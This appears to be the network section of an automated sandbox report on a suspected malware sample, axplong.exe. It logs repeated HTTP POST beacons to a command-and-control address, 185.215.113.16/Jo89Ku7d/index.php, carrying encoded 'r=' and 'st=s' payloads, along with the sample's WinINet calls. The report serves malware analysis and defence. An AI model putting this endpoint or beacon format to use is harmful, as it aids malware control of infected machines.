                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                  Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_0022BD60 InternetOpenW,InternetConnectA,HttpSendRequestA,InternetReadFile,5_2_0022BD60
                  Source: unknownHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: axplong.exe, 00000005.00000002.3453927497.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000002.3453927497.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000002.3453927497.0000000000DA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
                  Source: axplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php#h
